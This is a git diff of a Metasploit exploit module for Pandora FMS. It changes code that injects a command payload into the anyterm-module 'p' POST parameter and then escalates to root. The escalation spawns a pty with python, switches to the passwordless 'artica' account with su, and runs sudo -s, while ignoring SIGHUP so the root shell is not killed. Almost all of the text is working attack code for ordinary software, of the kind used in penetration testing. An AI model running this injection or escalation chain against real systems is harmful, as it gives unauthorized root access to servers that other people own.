diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index d24d4bef50..66c7567798 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb @@ -59,16 +59,22 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(client) print_status("#{peer} - Trying to escalate privileges to root") - # Spawn a pty for su/sudo - client.shell_command_token("python -c 'import pty;pty.spawn(\"/bin/sh\")'") - # Su to the passwordless "artica" account - client.shell_command_token("su - artica") - # The "artica" use has sudo rights without the need for a password, thus gain root priveleges - client.shell_command_token("sudo -s") - end + [ + # ignore SIGHUP so the server doesn't kill our root shell + "trap '' HUP", + # Spawn a pty for su/sudo + "python -c 'import pty;pty.spawn(\"/bin/sh\")'", + # Su to the passwordless "artica" account + "su - artica", + # The "artica" use has sudo rights without the need for a + # password, thus gain root priveleges + "sudo -s", + ].each do |command| + vprint_status(command) + client.shell_write(command + "\n") + end - def peer - return "#{rhost}:#{rport}" + super end def check @@ -80,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "anyterm.html") }) - if res and res.code == 200 and res.body =~ /Pandora FMS Remote Gateway/ + if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway") print_good("#{peer} - Pandora FMS Remote Gateway Detected!") return Exploit::CheckCode::Detected end @@ -95,14 +101,13 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "/anyterm-module"), 'vars_post' => { 'a' => "open", - 'p' => "`nohup #{payload.encoded}`" + 'p' => "`#{payload.encoded}`" } }) - if not res or res.code != 200 + if !res || res.code != 200 fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!") end - end end